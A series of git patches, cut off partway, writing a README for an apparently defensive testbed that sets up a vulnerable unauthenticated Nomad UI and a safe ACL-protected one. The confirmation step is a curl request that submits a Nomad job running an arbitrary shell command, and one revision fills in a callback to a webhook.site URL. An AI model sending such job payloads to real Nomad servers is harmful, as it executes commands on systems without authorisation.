From 23833181edf39a28ae8e20d1c1a79324d2089a23 Mon Sep 17 00:00:00 2001 From: am0o0 <77095239+am0o0@users.noreply.github.com> Date: Thu, 14 Aug 2025 01:27:57 +0400 Subject: [PATCH 01/14] unauthenticated nomad instance --- hashicorp/nomad/exposed_ui/README.md | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 hashicorp/nomad/exposed_ui/README.md diff --git a/hashicorp/nomad/exposed_ui/README.md b/hashicorp/nomad/exposed_ui/README.md new file mode 100644 index 00000000..bdf1b7e9 --- /dev/null +++ b/hashicorp/nomad/exposed_ui/README.md @@ -0,0 +1,22 @@ +# setup an unauthenticated nomad ui +you can install nomad cli according to the official document: https://developer.hashicorp.com/nomad/install +OR base on ubuntu 24.04, docker should be installed. +```bash +wget https://releases.hashicorp.com/nomad/1.10.4/nomad_1.10.4_linux_amd64.zip +unzip nomad_1.10.4_linux_amd64.zip && rm nomad_1.10.4_linux_amd64.zip +sudo ./nomad agent -dev \ +-bind 0.0.0.0 \ +-network-interface='{{ GetDefaultInterfaces | attr "name" }}' + +# open another terminal +sudo ./nomad ui --show-url +``` + +# confirming the exposed ui +```bash +# replace the COMMAND_HERE with your command like `curl url` +curl 'http://localhost:4646/v1/jobs' -X POST -H 'content-type: application/json; charset=utf-8' --data-raw '{"Job":{"Affinities":null,"AllAtOnce":false,"Constraints":null,"ConsulNamespace":"","CreateIndex":0,"Datacenters":["dc1"],"DispatchIdempotencyToken":null,"Dispatched":false,"ID":"tsunami-job","JobModifyIndex":0,"Meta":null,"Migrate":null,"ModifyIndex":0,"Multiregion":null,"Name":"tsunami-job","Namespace":"default","NodePool":"","NomadTokenID":"","ParameterizedJob":null,"ParentID":"","Payload":null,"Periodic":null,"Priority":50,"Region":"global","Reschedule":null,"Spreads":null,"Stable":false,"Status":"","StatusDescription":"","Stop":false,"SubmitTime":null,"TaskGroups":[{"Affinities":null,"Constraints":null,"Consul":null,"Count":1,"Disconnect":null,"EphemeralDisk":{"Migrate":false,"SizeMB":300,"Sticky":false},"MaxClientDisconnect":null,"Meta":null,"Migrate":null,"Name":"curl","Networks":null,"PreventRescheduleOnLost":null,"ReschedulePolicy":{"Attempts":1,"Delay":5000000000,"DelayFunction":"constant","Interval":86400000000000,"MaxDelay":0,"Unlimited":false},"RestartPolicy":{"Attempts":3,"Delay":15000000000,"Interval":86400000000000,"Mode":"fail","RenderTemplates":false},"Scaling":null,"Services":null,"ShutdownDelay":null,"Spreads":null,"StopAfterClientDisconnect":null,"Tasks":[{"Actions":null,"Affinities":null,"Artifacts":null,"Config":{"args":["-lc","COMMAND_HERE"],"image":"curlimages/curl:8.8.0","command":"sh"},"Constraints":null,"Consul":null,"DispatchPayload":null,"Driver":"docker","Env":null,"Identities":null,"Identity":null,"KillSignal":"","KillTimeout":5000000000,"Kind":"","Leader":false,"Lifecycle":null,"LogConfig":{"Disabled":false,"Enabled":null,"MaxFileSizeMB":10,"MaxFiles":10},"Meta":null,"Name":"run-curl","Resources":{"CPU":100,"Cores":0,"Devices":null,"DiskMB":null,"IOPS":null,"MemoryMB":64,"MemoryMaxMB":null,"NUMA":null,"Networks":null,"SecretsMB":null},"RestartPolicy":{"Attempts":3,"Delay":15000000000,"Interval":86400000000000,"Mode":"fail","RenderTemplates":false},"ScalingPolicies":null,"Schedule":null,"Services":null,"ShutdownDelay":0,"Templates":null,"User":"","Vault":null,"VolumeMounts":null}],"Update":null,"Volumes":null}],"Type":"batch","UI":null,"Update":null,"VaultNamespace":"","Version":0,"VersionTag":null,"meta":{}},"Submission":{"Source":"job \"tsunami-job\" {\n datacenters = [\"dc1\"]\n type = \"batch\"\n\n group \"curl\" {\n count = 1\n\n task \"run-curl\" {\n driver = \"docker\"\n\n config {\n image = \"curlimages/curl:8.8.0\"\n command = \"sh\"\n args = [\n \"-lc\",\n \"\"\n ]\n }\n\n resources {\n cpu = 100\n memory = 64\n }\n }\n }\n}","Format":"hcl2"}}' + +# clean up +curl 'http://localhost:4646/v1/job/tsunami-job?purge=true' -X DELETE -H 'content-type: application/json; charset=utf-8' +``` \ No newline at end of file From fa9e28619fee1687cb427f35ed8dba40b9e61a93 Mon Sep 17 00:00:00 2001 From: am0o0 <77095239+am0o0@users.noreply.github.com> Date: Fri, 22 Aug 2025 00:25:41 +0400 Subject: [PATCH 02/14] use docker instead of install nomad in local --- hashicorp/nomad/exposed_ui/README.md | 11 ++--------- 1 file changed, 2 insertions(+), 9 deletions(-) diff --git a/hashicorp/nomad/exposed_ui/README.md b/hashicorp/nomad/exposed_ui/README.md index bdf1b7e9..67c219ad 100644 --- a/hashicorp/nomad/exposed_ui/README.md +++ b/hashicorp/nomad/exposed_ui/README.md @@ -1,15 +1,8 @@ # setup an unauthenticated nomad ui you can install nomad cli according to the official document: https://developer.hashicorp.com/nomad/install -OR base on ubuntu 24.04, docker should be installed. +OR base on ubuntu 24.04 with docker run the following command to run nomad: ```bash -wget https://releases.hashicorp.com/nomad/1.10.4/nomad_1.10.4_linux_amd64.zip -unzip nomad_1.10.4_linux_amd64.zip && rm nomad_1.10.4_linux_amd64.zip -sudo ./nomad agent -dev \ --bind 0.0.0.0 \ --network-interface='{{ GetDefaultInterfaces | attr "name" }}' - -# open another terminal -sudo ./nomad ui --show-url +docker run --rm -it --privileged -v /sys/fs/cgroup:/sys/fs/cgroup:rw -p 4646:4646 hashicorp/nomad:1.10 agent -dev -bind 0.0.0.0 -network-interface='{{ GetDefaultInterfaces | attr "name" }}' ``` # confirming the exposed ui From 35a247ccc23fd0453b59bdc1933f5b00c9fce080 Mon Sep 17 00:00:00 2001 From: am0o0 <77095239+am0o0@users.noreply.github.com> Date: Fri, 13 Feb 2026 20:36:30 +0400 Subject: [PATCH 03/14] setup an authenticated nomad ui (safe) --- hashicorp/nomad/exposed_ui/README.md | 41 ++++++++++++++++++++++++++-- 1 file changed, 38 insertions(+), 3 deletions(-) diff --git a/hashicorp/nomad/exposed_ui/README.md b/hashicorp/nomad/exposed_ui/README.md index 67c219ad..491ebf2a 100644 --- a/hashicorp/nomad/exposed_ui/README.md +++ b/hashicorp/nomad/exposed_ui/README.md @@ -1,8 +1,12 @@ -# setup an unauthenticated nomad ui +# setup an unauthenticated nomad ui (vulnerable) you can install nomad cli according to the official document: https://developer.hashicorp.com/nomad/install OR base on ubuntu 24.04 with docker run the following command to run nomad: ```bash -docker run --rm -it --privileged -v /sys/fs/cgroup:/sys/fs/cgroup:rw -p 4646:4646 hashicorp/nomad:1.10 agent -dev -bind 0.0.0.0 -network-interface='{{ GetDefaultInterfaces | attr "name" }}' +docker run --rm -it \ + -v /sys/fs/cgroup:/sys/fs/cgroup:rw \ + -p 4646:4646 \ + hashicorp/nomad:1.10 \ + agent -dev -bind 0.0.0.0 -network-interface='{{ GetDefaultInterfaces | attr "name" }}' ``` # confirming the exposed ui @@ -12,4 +16,35 @@ curl 'http://localhost:4646/v1/jobs' -X POST -H 'content-type: application/json # clean up curl 'http://localhost:4646/v1/job/tsunami-job?purge=true' -X DELETE -H 'content-type: application/json; charset=utf-8' -``` \ No newline at end of file +``` + +# setup an authenticated nomad ui (safe) +This version enables Nomad's ACL system, which requires a valid token for all API and UI access. +```bash +docker run --rm -it \ + --name nomad-safe \ + -v /sys/fs/cgroup:/sys/fs/cgroup:rw \ + -p 4646:4646 \ + hashicorp/nomad:1.10 \ + agent -dev -bind 0.0.0.0 -network-interface='{{ GetDefaultInterfaces | attr "name" }}' \ + -acl-enabled +``` + +After the agent starts, bootstrap the ACL system to get a management token: +```bash +docker exec nomad-safe nomad acl bootstrap +``` +This will output a `Secret ID` (the management token). All subsequent API/UI requests require this token. + +# confirming the safe setup +Without a valid token, API requests are rejected with a 403: +```bash +curl 'http://localhost:4646/v1/jobs' +# Permission denied +``` +With the management token, requests succeed: +```bash +# Replace with the Secret ID from the bootstrap step +curl -H "X-Nomad-Token: " 'http://localhost:4646/v1/jobs' +# Expected output(when there is no job): [] +``` From 8e9cc5f23634b4528e7eed592d4921ce1b8ee2d4 Mon Sep 17 00:00:00 2001 From: am0o0 <77095239+am0o0@users.noreply.github.com> Date: Fri, 20 Feb 2026 05:30:26 +0400 Subject: [PATCH 04/14] add --privileged and warnings --- hashicorp/nomad/exposed_ui/README.md | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/hashicorp/nomad/exposed_ui/README.md b/hashicorp/nomad/exposed_ui/README.md index 491ebf2a..14a1f200 100644 --- a/hashicorp/nomad/exposed_ui/README.md +++ b/hashicorp/nomad/exposed_ui/README.md @@ -1,9 +1,12 @@ # setup an unauthenticated nomad ui (vulnerable) you can install nomad cli according to the official document: https://developer.hashicorp.com/nomad/install OR base on ubuntu 24.04 with docker run the following command to run nomad: +## Warnings +1. The containers will run with `--privileged`. +2. the container doesn't run on the Apple Silicon ```bash docker run --rm -it \ - -v /sys/fs/cgroup:/sys/fs/cgroup:rw \ + --privileged -v /sys/fs/cgroup:/sys/fs/cgroup:rw \ -p 4646:4646 \ hashicorp/nomad:1.10 \ agent -dev -bind 0.0.0.0 -network-interface='{{ GetDefaultInterfaces | attr "name" }}' @@ -23,7 +26,7 @@ This version enables Nomad's ACL system, which requires a valid token for all AP ```bash docker run --rm -it \ --name nomad-safe \ - -v /sys/fs/cgroup:/sys/fs/cgroup:rw \ + --privileged -v /sys/fs/cgroup:/sys/fs/cgroup:rw \ -p 4646:4646 \ hashicorp/nomad:1.10 \ agent -dev -bind 0.0.0.0 -network-interface='{{ GetDefaultInterfaces | attr "name" }}' \ From 6970ec56e9458030409bf3f3207ccc85e40ccba1 Mon Sep 17 00:00:00 2001 From: am0o0 <77095239+am0o0@users.noreply.github.com> Date: Fri, 20 Feb 2026 15:39:27 +0400 Subject: [PATCH 05/14] add '-v /var/run/docker.sock:/var/run/docker.sock' --- hashicorp/nomad/exposed_ui/README.md | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/hashicorp/nomad/exposed_ui/README.md b/hashicorp/nomad/exposed_ui/README.md index 14a1f200..5e4b4057 100644 --- a/hashicorp/nomad/exposed_ui/README.md +++ b/hashicorp/nomad/exposed_ui/README.md @@ -5,8 +5,9 @@ OR base on ubuntu 24.04 with docker run the following command to run nomad: 1. The containers will run with `--privileged`. 2. the container doesn't run on the Apple Silicon ```bash -docker run --rm -it \ +sudo docker run --rm -it \ --privileged -v /sys/fs/cgroup:/sys/fs/cgroup:rw \ + -v /var/run/docker.sock:/var/run/docker.sock \ -p 4646:4646 \ hashicorp/nomad:1.10 \ agent -dev -bind 0.0.0.0 -network-interface='{{ GetDefaultInterfaces | attr "name" }}' @@ -15,7 +16,7 @@ docker run --rm -it \ # confirming the exposed ui ```bash # replace the COMMAND_HERE with your command like `curl url` -curl 'http://localhost:4646/v1/jobs' -X POST -H 'content-type: application/json; charset=utf-8' --data-raw '{"Job":{"Affinities":null,"AllAtOnce":false,"Constraints":null,"ConsulNamespace":"","CreateIndex":0,"Datacenters":["dc1"],"DispatchIdempotencyToken":null,"Dispatched":false,"ID":"tsunami-job","JobModifyIndex":0,"Meta":null,"Migrate":null,"ModifyIndex":0,"Multiregion":null,"Name":"tsunami-job","Namespace":"default","NodePool":"","NomadTokenID":"","ParameterizedJob":null,"ParentID":"","Payload":null,"Periodic":null,"Priority":50,"Region":"global","Reschedule":null,"Spreads":null,"Stable":false,"Status":"","StatusDescription":"","Stop":false,"SubmitTime":null,"TaskGroups":[{"Affinities":null,"Constraints":null,"Consul":null,"Count":1,"Disconnect":null,"EphemeralDisk":{"Migrate":false,"SizeMB":300,"Sticky":false},"MaxClientDisconnect":null,"Meta":null,"Migrate":null,"Name":"curl","Networks":null,"PreventRescheduleOnLost":null,"ReschedulePolicy":{"Attempts":1,"Delay":5000000000,"DelayFunction":"constant","Interval":86400000000000,"MaxDelay":0,"Unlimited":false},"RestartPolicy":{"Attempts":3,"Delay":15000000000,"Interval":86400000000000,"Mode":"fail","RenderTemplates":false},"Scaling":null,"Services":null,"ShutdownDelay":null,"Spreads":null,"StopAfterClientDisconnect":null,"Tasks":[{"Actions":null,"Affinities":null,"Artifacts":null,"Config":{"args":["-lc","COMMAND_HERE"],"image":"curlimages/curl:8.8.0","command":"sh"},"Constraints":null,"Consul":null,"DispatchPayload":null,"Driver":"docker","Env":null,"Identities":null,"Identity":null,"KillSignal":"","KillTimeout":5000000000,"Kind":"","Leader":false,"Lifecycle":null,"LogConfig":{"Disabled":false,"Enabled":null,"MaxFileSizeMB":10,"MaxFiles":10},"Meta":null,"Name":"run-curl","Resources":{"CPU":100,"Cores":0,"Devices":null,"DiskMB":null,"IOPS":null,"MemoryMB":64,"MemoryMaxMB":null,"NUMA":null,"Networks":null,"SecretsMB":null},"RestartPolicy":{"Attempts":3,"Delay":15000000000,"Interval":86400000000000,"Mode":"fail","RenderTemplates":false},"ScalingPolicies":null,"Schedule":null,"Services":null,"ShutdownDelay":0,"Templates":null,"User":"","Vault":null,"VolumeMounts":null}],"Update":null,"Volumes":null}],"Type":"batch","UI":null,"Update":null,"VaultNamespace":"","Version":0,"VersionTag":null,"meta":{}},"Submission":{"Source":"job \"tsunami-job\" {\n datacenters = [\"dc1\"]\n type = \"batch\"\n\n group \"curl\" {\n count = 1\n\n task \"run-curl\" {\n driver = \"docker\"\n\n config {\n image = \"curlimages/curl:8.8.0\"\n command = \"sh\"\n args = [\n \"-lc\",\n \"\"\n ]\n }\n\n resources {\n cpu = 100\n memory = 64\n }\n }\n }\n}","Format":"hcl2"}}' +curl 'http://localhost:4646/v1/jobs' -X POST -H 'content-type: application/json; charset=utf-8' --data-raw '{"Job":{"Affinities":null,"AllAtOnce":false,"Constraints":null,"ConsulNamespace":"","CreateIndex":0,"Datacenters":["dc1"],"DispatchIdempotencyToken":null,"Dispatched":false,"ID":"tsunami-job","JobModifyIndex":0,"Meta":null,"Migrate":null,"ModifyIndex":0,"Multiregion":null,"Name":"tsunami-job","Namespace":"default","NodePool":"","NomadTokenID":"","ParameterizedJob":null,"ParentID":"","Payload":null,"Periodic":null,"Priority":50,"Region":"global","Reschedule":null,"Spreads":null,"Stable":false,"Status":"","StatusDescription":"","Stop":false,"SubmitTime":null,"TaskGroups":[{"Affinities":null,"Constraints":null,"Consul":null,"Count":1,"Disconnect":null,"EphemeralDisk":{"Migrate":false,"SizeMB":300,"Sticky":false},"MaxClientDisconnect":null,"Meta":null,"Migrate":null,"Name":"curl","Networks":null,"PreventRescheduleOnLost":null,"ReschedulePolicy":{"Attempts":1,"Delay":5000000000,"DelayFunction":"constant","Interval":86400000000000,"MaxDelay":0,"Unlimited":false},"RestartPolicy":{"Attempts":3,"Delay":15000000000,"Interval":86400000000000,"Mode":"fail","RenderTemplates":false},"Scaling":null,"Services":null,"ShutdownDelay":null,"Spreads":null,"StopAfterClientDisconnect":null,"Tasks":[{"Actions":null,"Affinities":null,"Artifacts":null,"Config":{"args":["-lc","curl https://webhook.site/4005ef73-683e-4d8d-be9e-54253eb2f2b2"],"image":"curlimages/curl:8.8.0","command":"sh"},"Constraints":null,"Consul":null,"DispatchPayload":null,"Driver":"docker","Env":null,"Identities":null,"Identity":null,"KillSignal":"","KillTimeout":5000000000,"Kind":"","Leader":false,"Lifecycle":null,"LogConfig":{"Disabled":false,"Enabled":null,"MaxFileSizeMB":10,"MaxFiles":10},"Meta":null,"Name":"run-curl","Resources":{"CPU":100,"Cores":0,"Devices":null,"DiskMB":null,"IOPS":null,"MemoryMB":64,"MemoryMaxMB":null,"NUMA":null,"Networks":null,"SecretsMB":null},"RestartPolicy":{"Attempts":3,"Delay":15000000000,"Interval":86400000000000,"Mode":"fail","RenderTemplates":false},"ScalingPolicies":null,"Schedule":null,"Services":null,"ShutdownDelay":0,"Templates":null,"User":"","Vault":null,"VolumeMounts":null}],"Update":null,"Volumes":null}],"Type":"batch","UI":null,"Update":null,"VaultNamespace":"","Version":0,"VersionTag":null,"meta":{}},"Submission":{"Source":"job \"tsunami-job\" {\n datacenters = [\"dc1\"]\n type = \"batch\"\n\n group \"curl\" {\n count = 1\n\n task \"run-curl\" {\n driver = \"docker\"\n\n config {\n image = \"curlimages/curl:8.8.0\"\n command = \"sh\"\n args = [\n \"-lc\",\n \"\"\n ]\n }\n\n resources {\n cpu = 100\n memory = 64\n }\n }\n }\n}","Format":"hcl2"}}' # clean up curl 'http://localhost:4646/v1/job/tsunami-job?purge=true' -X DELETE -H 'content-type: application/json; charset=utf-8' @@ -24,9 +25,10 @@ curl 'http://localhost:4646/v1/job/tsunami-job?purge=true' -X DELETE -H 'content # setup an authenticated nomad ui (safe) This version enables Nomad's ACL system, which requires a valid token for all API and UI access. ```bash -docker run --rm -it \ +sudo docker run --rm -it \ --name nomad-safe \ --privileged -v /sys/fs/cgroup:/sys/fs/cgroup:rw \ + -v /var/run/docker.sock:/var/run/docker.sock \ -p 4646:4646 \ hashicorp/nomad:1.10 \ agent -dev -bind 0.0.0.0 -network-interface='{{ GetDefaultInterfaces | attr "name" }}' \ @@ -35,7 +37,7 @@ docker run --rm -it \ After the agent starts, bootstrap the ACL system to get a management token: ```bash -docker exec nomad-safe nomad acl bootstrap +sudo docker exec nomad-safe nomad acl bootstrap ``` This will output a `Secret ID` (the management token). All subsequent API/UI requests require this token. From 3bc38a6ef171692be5d0a180cfb5f34b42d78a2c Mon Sep 17 00:00:00 2001 From: am0o0 <77095239+am0o0@users.noreply.github.com> Date: Fri, 20 Feb 2026 15:44:25 +0400 Subject: [PATCH 06/14] remove unnecessary sudo --- hashicorp/nomad/exposed_ui/README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/hashicorp/nomad/exposed_ui/README.md b/hashicorp/nomad/exposed_ui/README.md index 5e4b4057..9a415dda 100644 --- a/hashicorp/nomad/exposed_ui/README.md +++ b/hashicorp/nomad/exposed_ui/README.md @@ -5,7 +5,7 @@ OR base on ubuntu 24.04 with docker run the following command to run nomad: 1. The containers will run with `--privileged`. 2. the container doesn't run on the Apple Silicon ```bash -sudo docker run --rm -it \ +docker run --rm -it \ --privileged -v /sys/fs/cgroup:/sys/fs/cgroup:rw \ -v /var/run/docker.sock:/var/run/docker.sock \ -p 4646:4646 \ @@ -25,7 +25,7 @@ curl 'http://localhost:4646/v1/job/tsunami-job?purge=true' -X DELETE -H 'content # setup an authenticated nomad ui (safe) This version enables Nomad's ACL system, which requires a valid token for all API and UI access. ```bash -sudo docker run --rm -it \ +docker run --rm -it \ --name nomad-safe \ --privileged -v /sys/fs/cgroup:/sys/fs/cgroup:rw \ -v /var/run/docker.sock:/var/run/docker.sock \ @@ -37,7 +37,7 @@ sudo docker run --rm -it \ After the agent starts, bootstrap the ACL system to get a management token: ```bash -sudo docker exec nomad-safe nomad acl bootstrap +docker exec nomad-safe nomad acl bootstrap ``` This will output a `Secret ID` (the management token). All subsequent API/UI requests require this token. From ba4715ea6896d23df5df6fd257c0fe3325fa9d04 Mon Sep 17 00:00:00 2001 From: Am <77095239+am0o0@users.noreply.github.com> Date: Fri, 27 Feb 2026 19:55:44 +0400 Subject: [PATCH 07/14] Update hashicorp/nomad/exposed_ui/README.md Co-authored-by: Robert Dick --- hashicorp/nomad/exposed_ui/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/hashicorp/nomad/exposed_ui/README.md b/hashicorp/nomad/exposed_ui/README.md index 9a415dda..d4dc6cea 100644 --- a/hashicorp/nomad/exposed_ui/README.md +++ b/hashicorp/nomad/exposed_ui/README.md @@ -41,7 +41,7 @@ docker exec nomad-safe nomad acl bootstrap ``` This will output a `Secret ID` (the management token). All subsequent API/UI requests require this token. -# confirming the safe setup +# Confirming the Safe Setup Without a valid token, API requests are rejected with a 403: ```bash curl 'http://localhost:4646/v1/jobs' From c27d83dec1eb94119f20cbbfd2525c0c0460f55b Mon Sep 17 00:00:00 2001 From: Am <77095239+am0o0@users.noreply.github.com> Date: Fri, 27 Feb 2026 19:56:17 +0400 Subject: [PATCH 08/14] Update hashicorp/nomad/exposed_ui/README.md Co-authored-by: Robert Dick --- hashicorp/nomad/exposed_ui/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/hashicorp/nomad/exposed_ui/README.md b/hashicorp/nomad/exposed_ui/README.md index d4dc6cea..58e2176e 100644 --- a/hashicorp/nomad/exposed_ui/README.md +++ b/hashicorp/nomad/exposed_ui/README.md @@ -16,7 +16,7 @@ docker run --rm -it \ # confirming the exposed ui ```bash # replace the COMMAND_HERE with your command like `curl url` -curl 'http://localhost:4646/v1/jobs' -X POST -H 'content-type: application/json; charset=utf-8' --data-raw '{"Job":{"Affinities":null,"AllAtOnce":false,"Constraints":null,"ConsulNamespace":"","CreateIndex":0,"Datacenters":["dc1"],"DispatchIdempotencyToken":null,"Dispatched":false,"ID":"tsunami-job","JobModifyIndex":0,"Meta":null,"Migrate":null,"ModifyIndex":0,"Multiregion":null,"Name":"tsunami-job","Namespace":"default","NodePool":"","NomadTokenID":"","ParameterizedJob":null,"ParentID":"","Payload":null,"Periodic":null,"Priority":50,"Region":"global","Reschedule":null,"Spreads":null,"Stable":false,"Status":"","StatusDescription":"","Stop":false,"SubmitTime":null,"TaskGroups":[{"Affinities":null,"Constraints":null,"Consul":null,"Count":1,"Disconnect":null,"EphemeralDisk":{"Migrate":false,"SizeMB":300,"Sticky":false},"MaxClientDisconnect":null,"Meta":null,"Migrate":null,"Name":"curl","Networks":null,"PreventRescheduleOnLost":null,"ReschedulePolicy":{"Attempts":1,"Delay":5000000000,"DelayFunction":"constant","Interval":86400000000000,"MaxDelay":0,"Unlimited":false},"RestartPolicy":{"Attempts":3,"Delay":15000000000,"Interval":86400000000000,"Mode":"fail","RenderTemplates":false},"Scaling":null,"Services":null,"ShutdownDelay":null,"Spreads":null,"StopAfterClientDisconnect":null,"Tasks":[{"Actions":null,"Affinities":null,"Artifacts":null,"Config":{"args":["-lc","curl https://webhook.site/4005ef73-683e-4d8d-be9e-54253eb2f2b2"],"image":"curlimages/curl:8.8.0","command":"sh"},"Constraints":null,"Consul":null,"DispatchPayload":null,"Driver":"docker","Env":null,"Identities":null,"Identity":null,"KillSignal":"","KillTimeout":5000000000,"Kind":"","Leader":false,"Lifecycle":null,"LogConfig":{"Disabled":false,"Enabled":null,"MaxFileSizeMB":10,"MaxFiles":10},"Meta":null,"Name":"run-curl","Resources":{"CPU":100,"Cores":0,"Devices":null,"DiskMB":null,"IOPS":null,"MemoryMB":64,"MemoryMaxMB":null,"NUMA":null,"Networks":null,"SecretsMB":null},"RestartPolicy":{"Attempts":3,"Delay":15000000000,"Interval":86400000000000,"Mode":"fail","RenderTemplates":false},"ScalingPolicies":null,"Schedule":null,"Services":null,"ShutdownDelay":0,"Templates":null,"User":"","Vault":null,"VolumeMounts":null}],"Update":null,"Volumes":null}],"Type":"batch","UI":null,"Update":null,"VaultNamespace":"","Version":0,"VersionTag":null,"meta":{}},"Submission":{"Source":"job \"tsunami-job\" {\n datacenters = [\"dc1\"]\n type = \"batch\"\n\n group \"curl\" {\n count = 1\n\n task \"run-curl\" {\n driver = \"docker\"\n\n config {\n image = \"curlimages/curl:8.8.0\"\n command = \"sh\"\n args = [\n \"-lc\",\n \"\"\n ]\n }\n\n resources {\n cpu = 100\n memory = 64\n }\n }\n }\n}","Format":"hcl2"}}' +curl 'http://localhost:4646/v1/jobs' -X POST -H 'content-type: application/json; charset=utf-8' --data-raw '{"Job":{"Affinities":null,"AllAtOnce":false,"Constraints":null,"ConsulNamespace":"","CreateIndex":0,"Datacenters":["dc1"],"DispatchIdempotencyToken":null,"Dispatched":false,"ID":"tsunami-job","JobModifyIndex":0,"Meta":null,"Migrate":null,"ModifyIndex":0,"Multiregion":null,"Name":"tsunami-job","Namespace":"default","NodePool":"","NomadTokenID":"","ParameterizedJob":null,"ParentID":"","Payload":null,"Periodic":null,"Priority":50,"Region":"global","Reschedule":null,"Spreads":null,"Stable":false,"Status":"","StatusDescription":"","Stop":false,"SubmitTime":null,"TaskGroups":[{"Affinities":null,"Constraints":null,"Consul":null,"Count":1,"Disconnect":null,"EphemeralDisk":{"Migrate":false,"SizeMB":300,"Sticky":false},"MaxClientDisconnect":null,"Meta":null,"Migrate":null,"Name":"curl","Networks":null,"PreventRescheduleOnLost":null,"ReschedulePolicy":{"Attempts":1,"Delay":5000000000,"DelayFunction":"constant","Interval":86400000000000,"MaxDelay":0,"Unlimited":false},"RestartPolicy":{"Attempts":3,"Delay":15000000000,"Interval":86400000000000,"Mode":"fail","RenderTemplates":false},"Scaling":null,"Services":null,"ShutdownDelay":null,"Spreads":null,"StopAfterClientDisconnect":null,"Tasks":[{"Actions":null,"Affinities":null,"Artifacts":null,"Config":{"args":["-lc","COMMAND_HERE"],"image":"curlimages/curl:8.8.0","command":"sh"},"Constraints":null,"Consul":null,"DispatchPayload":null,"Driver":"docker","Env":null,"Identities":null,"Identity":null,"KillSignal":"","KillTimeout":5000000000,"Kind":"","Leader":false,"Lifecycle":null,"LogConfig":{"Disabled":false,"Enabled":null,"MaxFileSizeMB":10,"MaxFiles":10},"Meta":null,"Name":"run-curl","Resources":{"CPU":100,"Cores":0,"Devices":null,"DiskMB":null,"IOPS":null,"MemoryMB":64,"MemoryMaxMB":null,"NUMA":null,"Networks":null,"SecretsMB":null},"RestartPolicy":{"Attempts":3,"Delay":15000000000,"Interval":86400000000000,"Mode":"fail","RenderTemplates":false},"ScalingPolicies":null,"Schedule":null,"Services":null,"ShutdownDelay":0,"Templates":null,"User":"","Vault":null,"VolumeMounts":null}],"Update":null,"Volumes":null}],"Type":"batch","UI":null,"Update":null,"VaultNamespace":"","Version":0,"VersionTag":null,"meta":{}},"Submission":{"Source":"job \"tsunami-job\" {\n datacenters = [\"dc1\"]\n type = \"batch\"\n\n group \"curl\" {\n count = 1\n\n task \"run-curl\" {\n driver = \"docker\"\n\n config {\n image = \"curlimages/curl:8.8.0\"\n command = \"sh\"\n args = [\n \"-lc\",\n \"\"\n ]\n }\n\n resources {\n cpu = 100\n memory = 64\n }\n }\n }\n}","Format":"hcl2"}}' # clean up curl 'http://localhost:4646/v1/job/tsunami-job?purge=true' -X DELETE -H 'content-type: application/json; charset=utf-8' From 1e8c96a53a1bd670edc22722175e1b00cfcbb50a Mon Sep 17 00:00:00 2001 From: Am <77095239+am0o0@users.noreply.github.com> Date: Fri, 27 Feb 2026 19:56:26 +0400 Subject: [PATCH 09/14] Update hashicorp/nomad/exposed_ui/README.md Co-authored-by: Robert Dick --- hashicorp/nomad/exposed_ui/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/hashicorp/nomad/exposed_ui/README.md b/hashicorp/nomad/exposed_ui/README.md index 58e2176e..f7fd72bd 100644 --- a/hashicorp/nomad/exposed_ui/README.md +++ b/hashicorp/nomad/exposed_ui/README.md @@ -1,4 +1,4 @@ -# setup an unauthenticated nomad ui (vulnerable) +# Set Up an Unauthenticated Nomad UI (Vulnerable) you can install nomad cli according to the official document: https://developer.hashicorp.com/nomad/install OR base on ubuntu 24.04 with docker run the following command to run nomad: ## Warnings From ede417f0cb5df8ca425a4e347ee758f0c1b7ed4f Mon Sep 17 00:00:00 2001 From: Am <77095239+am0o0@users.noreply.github.com> Date: Fri, 27 Feb 2026 19:56:34 +0400 Subject: [PATCH 10/14] Update hashicorp/nomad/exposed_ui/README.md Co-authored-by: Robert Dick --- hashicorp/nomad/exposed_ui/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/hashicorp/nomad/exposed_ui/README.md b/hashicorp/nomad/exposed_ui/README.md index f7fd72bd..d664902c 100644 --- a/hashicorp/nomad/exposed_ui/README.md +++ b/hashicorp/nomad/exposed_ui/README.md @@ -1,5 +1,5 @@ # Set Up an Unauthenticated Nomad UI (Vulnerable) -you can install nomad cli according to the official document: https://developer.hashicorp.com/nomad/install +You can install the Nomad CLI according to the official document: https://developer.hashicorp.com/nomad/install OR base on ubuntu 24.04 with docker run the following command to run nomad: ## Warnings 1. The containers will run with `--privileged`. From d390f2744fd459e811e486cdfc52f2bb453dc495 Mon Sep 17 00:00:00 2001 From: Am <77095239+am0o0@users.noreply.github.com> Date: Fri, 27 Feb 2026 19:56:42 +0400 Subject: [PATCH 11/14] Update hashicorp/nomad/exposed_ui/README.md Co-authored-by: Robert Dick --- hashicorp/nomad/exposed_ui/README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/hashicorp/nomad/exposed_ui/README.md b/hashicorp/nomad/exposed_ui/README.md index d664902c..e334ef67 100644 --- a/hashicorp/nomad/exposed_ui/README.md +++ b/hashicorp/nomad/exposed_ui/README.md @@ -1,6 +1,7 @@ # Set Up an Unauthenticated Nomad UI (Vulnerable) You can install the Nomad CLI according to the official document: https://developer.hashicorp.com/nomad/install -OR base on ubuntu 24.04 with docker run the following command to run nomad: + +OR to run Nomad on Ubuntu 24.04 with Docker run the following command: ## Warnings 1. The containers will run with `--privileged`. 2. the container doesn't run on the Apple Silicon From 6de4d152e23c0256443322a148df5dcd79ced60f Mon Sep 17 00:00:00 2001 From: Am <77095239+am0o0@users.noreply.github.com> Date: Fri, 27 Feb 2026 19:56:50 +0400 Subject: [PATCH 12/14] Update hashicorp/nomad/exposed_ui/README.md Co-authored-by: Robert Dick --- hashicorp/nomad/exposed_ui/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/hashicorp/nomad/exposed_ui/README.md b/hashicorp/nomad/exposed_ui/README.md index e334ef67..8d2ba38a 100644 --- a/hashicorp/nomad/exposed_ui/README.md +++ b/hashicorp/nomad/exposed_ui/README.md @@ -4,7 +4,7 @@ You can install the Nomad CLI according to the official document: https://develo 